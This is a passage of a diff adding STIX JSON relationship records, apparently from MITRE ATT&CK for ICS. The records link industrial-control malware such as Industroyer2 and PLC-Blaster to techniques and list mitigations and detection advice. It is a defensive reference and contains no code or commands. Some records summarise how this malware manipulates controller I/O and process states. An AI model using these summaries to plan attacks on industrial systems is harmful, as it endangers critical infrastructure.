"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:10:36.267Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is capable of sending command messages from the compromised device to target remote stations to open data channels, retrieve the location and values of Information Object Addresses (IOAs), and modify the IO state values through Select Before Operate I/O, Select/Execute, and Invert Default State operations.(Citation: Industroyer2 Mandiant April 2022)(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--74ec9ce5-3155-488c-ae56-570c47a1d207", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:45:26.506Z", + "modified": "2022-05-06T17:47:24.194Z", + "relationship_type": "mitigates", + "description": "ICS environments typically have more statically defined devices, therefore minimize the use of both IT discovery protocols (e.g., DHCP, LLDP) and discovery functions in automation protocols. (Citation: D. Parsons and D. Wylie September 2019) (Citation: Colin Gray) Examples of automation protocols with discovery capabilities include OPC UA Device Discovery (Citation: Josh Rinaldi April 2016), BACnet (Citation: Aditya K Sood July 2019), and Ethernet/IP. (Citation: Langner November 2018)\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "external_references": [ + { + "source_name": "D. Parsons and D. Wylie September 2019", + "description": "D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 ", + "url": "https://www.csiac.org/journal-article/practical-industrial-control-system-ics-cybersecurity-it-and-ot-have-converged-discover-and-defend-your-assets/" + }, + { + "source_name": "Colin Gray", + "description": "Colin Gray D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 How SDN Can Improve Cybersecurity in OT Networks Retrieved. 2020/09/25 ", + "url": "https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6891_HowSDN_CG_20180720_Web2.pdf?v=20190312-231901" + }, + { + "source_name": "Josh Rinaldi April 2016", + "description": "Josh Rinaldi 2016, April Still a Thrill: OPC UA Device Discovery Retrieved. 2020/09/25 ", + "url": "https://www.rtautomation.com/rtas-blog/still-a-thrill-opc-ua-device-discovery/" + }, + { + "source_name": "Aditya K Sood July 2019", + "description": "Aditya K Sood 2019, July Discovering and fingerprinting BACnet devices Retrieved. 2020/09/25 ", + "url": "https://www.helpnetsecurity.com/2019/07/10/bacnet-devices/" + }, + { + "source_name": "Langner November 2018", + "description": "Langner 2018, November Why Ethernet/IP changes the OT asset discovery game Retrieved. 2020/09/25 ", + "url": "https://www.langner.com/2018/11/why-ethernet-ip-changes-the-ot-asset-discovery-game/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b628d878-4f35-4580-8d42-26984d13821e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.143Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--68d30c45-766f-48b6-9405-0c969243332b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.214Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--2e377016-bb23-481e-b72b-a2ace8c72eb7", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:10:53.087Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--881ef4ba-a480-44de-8ab6-be2cdc87dcce", + "created": "2022-09-27T15:25:50.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:49:19.854Z", + "description": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0d540b53-6a5d-4f56-9dee-47707443b149", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T16:00:14.208Z", + "description": "Monitor ICS automation network protocols for functions related to reading an operational process state (e.g., “Read” function codes in protocols like DNP3 or Modbus). In some cases, there may be multiple ways to monitor an operational process’ state, one of which is typically used in the operational environment. Monitor for the operating mode being checked in unexpected ways.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca768c2a-0f14-471c-90a5-bce649e88d51", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.105Z", + "relationship_type": "mitigates", + "description": "Application denylists can be used to block automation protocol functions used to initiate device shutdowns or restarts, such as DNP3's 0x0D function code, or vulnerabilities that can be used to trigger device shutdowns (e.g., CVE-2014-9195, CVE-2015-5374).\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--35cf6922-d48f-42ea-b7f5-f0258892bd52", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:43:32.737Z", + "description": "Network segmentation can be used to isolate infrastructure components that do not require broad network access. This may mitigate, or at least alleviate, the scope of AiTM activity.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Restrict browsers to limit the capabilities of malicious ads and Javascript.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--064dfd6f-db5d-48e8-b350-9dd47a270911", + "created": "2022-09-28T20:22:09.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:16:59.156Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely read the OCP UA structure from devices.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0f137d8-3c56-4f6c-9d59-1ec231d61391", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:43:36.467Z", + "description": "Use deep packet inspection to look for artifacts of common exploit traffic, such as known payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.077Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--55f3dd59-08be-4e23-a680-b6db7850b399", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:59:50.879Z", + "description": "Monitor for newly executed processes of binaries that could be involved in data destruction activity, such as SDelete.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6d822f86-5793-403a-b176-5d533f6b81b3", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:43.236Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) RAT is distributed through trojanized installers planted on compromised vendor sites. (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d7ea83fa-87c7-4d36-96d5-aee554504040", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Marc-Etienne M.Lveill October 2017", + "description": "Marc-Etienne M.Lveill 2017, October 24 Bad Rabbit: NotPetya is back with improved ransomware Retrieved. 2019/10/27 ", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:02.075Z", + "description": "Several transportation organizations in Ukraine have suffered from being infected by [Bad Rabbit](https://attack.mitre.org/software/S0606), resulting in some computers becoming encrypted, according to media reports. (Citation: Marc-Etienne M.Lveill October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c329018-b591-42c4-8806-4d02ccd47476", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:36.262Z", + "description": "Monitor executed commands and arguments for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b136d10-1fd7-4cd4-a3a7-b648b23adc92", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:32:18.214Z", + "description": "Monitor for changes made to firmware for unexpected modifications to settings and/or data that may be used by rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Asset management systems should be consulted to understand known-good firmware versions and configurations.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d90aeeb6-3686-483a-8403-6514ecfe1a50", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:23:33.379Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload has caused multiple common OPC platforms to intermittently crash. This could cause a denial of service effect on applications reliant on OPC communications. (Citation: ICS-CERT August 2018)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2c8dd182-e0a1-469d-aa65-7a1f734d9b46", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for sending critical report messages to operators, this could include using radio/cell communication to obtain messages from field technicians that can locally obtain telemetry and status data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--76b8bbce-1c65-4337-a4d7-320c594dc29e", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:36:51.486Z", + "description": "Monitor for network traffic originating from unknown/unexpected hosts. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware. For added context on adversary procedures and background see [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7a4b080-e4a6-4c46-b2c7-84119df76393", + "created": "2022-09-26T14:43:24.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:49:34.799Z", + "description": "Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) Consider monitoring for new processes engaging in scanning activity or connecting to multiple systems by correlating process creation network data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cb4d802e-df5b-4017-81dd-47f65fff23a3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.219Z", + "relationship_type": "mitigates", + "description": "Encrypt any operational data with strong confidentiality requirements, including organizational trade-secrets, recipes, and other intellectual property (IP).\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6902da63-3b59-46f3-99e0-6008dd47ab70", + "created": "2022-09-27T15:33:16.221Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:38:13.560Z", + "description": "Monitor executed commands and arguments related to services specifically designed to accept remote graphical connections, such as RDP and VNC. [Remote Services](https://attack.mitre.org/techniques/T0886) and [Valid Accounts](https://attack.mitre.org/techniques/T0859) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6fa3aee4-2a29-4c0f-9e61-1f7df5eccc00", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:01:38.884Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) may manipulate any outputs of the PLC. Using the POU POKE any value within the process image may be modified. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c64f2ed2-f7a7-4333-b0d3-d687ffb7ad6b", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:30.482Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--868db512-b897-4a54-ae56-ac78f6c93a14", + "created": "2022-09-28T20:29:18.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": 